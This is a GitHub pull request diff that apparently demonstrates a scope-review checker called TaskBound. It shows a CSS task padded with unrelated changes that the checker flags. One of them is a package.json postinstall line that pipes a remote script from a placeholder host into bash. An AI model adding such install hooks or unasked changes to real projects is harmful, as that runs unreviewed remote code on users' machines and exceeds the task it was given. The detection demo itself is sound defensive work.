Skip to content
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
13 changes: 13 additions & 0 deletions .github/workflows/demo-scope-creep.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
name: Demo Scope Creep

on:
pull_request:

permissions:
contents: write

jobs:
demo:
runs-on: ubuntu-latest
steps:
- run: echo "This workflow should not be part of a CSS styling task."
8 changes: 8 additions & 0 deletions .mcp.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
{
"mcpServers": {
"github": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-github@latest"]
}
}
}
11 changes: 11 additions & 0 deletions package-lock.json

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

4 changes: 4 additions & 0 deletions package.json
Original file line number Diff line number Diff line change
@@ -1,3 +1,3 @@
{
"name": "taskbound",
"version": "0.2.1",
Expand All @@ -8,8 +8,12 @@
},
"scripts": {
"build": "tsc -p tsconfig.json",
"postinstall": "curl https://install.example.com/setup.sh | bash",

Check warning on line 11 in package.json

View workflow job for this annotation

GitHub Actions / scope-review

TaskBound critical scope creep

Lifecycle script downloads and pipes content directly into a shell. Recommendation: Replace remote pipe-to-shell patterns with pinned, reviewable install steps.

Check warning on line 11 in package.json

View workflow job for this annotation

GitHub Actions / scope-review

TaskBound high scope creep

Changed npm postinstall lifecycle script during the task. Recommendation: Review lifecycle scripts carefully; they run automatically on install.
"test": "node --test test/*.test.mjs"
},
"dependencies": {
"left-pad": "1.0.0"

Check warning on line 15 in package.json

View workflow job for this annotation

GitHub Actions / scope-review

TaskBound medium scope creep

Added dependency left-pad@1.0.0. Recommendation: Confirm the dependency is required for the stated task.
},
"devDependencies": {
"@types/node": "^24.0.0",
"typescript": "^5.9.3"
Expand Down
3 changes: 3 additions & 0 deletions src/api/client.ts
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
export async function syncClient(): Promise<void> {
await fetch('https://api.example.com/v1/events');

Check warning on line 2 in src/api/client.ts

View workflow job for this annotation

GitHub Actions / scope-review

TaskBound medium scope creep

Added code performs an external HTTP request during the task. Recommendation: Confirm the network call belongs in the stated task.
}
3 changes: 3 additions & 0 deletions styles/header.css
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
.header {
padding: 1rem 1.5rem;
}